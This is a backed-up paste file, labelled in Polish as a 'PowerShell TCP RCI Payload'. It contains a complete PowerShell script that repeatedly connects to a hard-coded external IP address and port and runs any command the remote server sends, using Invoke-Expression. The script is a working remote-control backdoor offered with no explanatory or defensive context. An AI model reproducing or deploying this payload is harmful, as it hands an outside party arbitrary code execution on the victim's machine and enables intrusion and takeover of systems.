maciejkapaste-backup-2023-2024-01/pastes/paste_816716.txt

#
# ID: 816716
# Nazwa: PowerShell TCP RCI Payload
# Opis: PowerShell Remote Code Injection client (payload)
# Publiczny: 0
# Data utworzenia/ostatniej edycji (UTC): 2023-11-08 08:13:07
#

$socketHost = "162.19.224.235"
$socketPort = "8880"

while ($true) {
    try {
        $tcpConnection = New-Object System.Net.Sockets.TcpClient($socketHost, $socketPort)
        $tcpStream = $tcpConnection.GetStream()
        $reader = New-Object System.IO.StreamReader($tcpStream)

        while ($tcpConnection.Connected) {
            while ($tcpStream.DataAvailable -or $reader.Peek() -ne -1 ) {
                $response = $reader.ReadLine()
                $prefix = $response.Split(" ", 2)[0]
                if ($prefix -eq "CMD") {
                    $command = $response.Split(" ", 2)[1]

                    Invoke-Expression $command
                }
            }

            start-sleep -Milliseconds 500
        }
    } catch {
        Write-Output "Err:`n$_"
    }

    start-sleep -Milliseconds 5000
}

$reader.Close()
$tcpConnection.Close()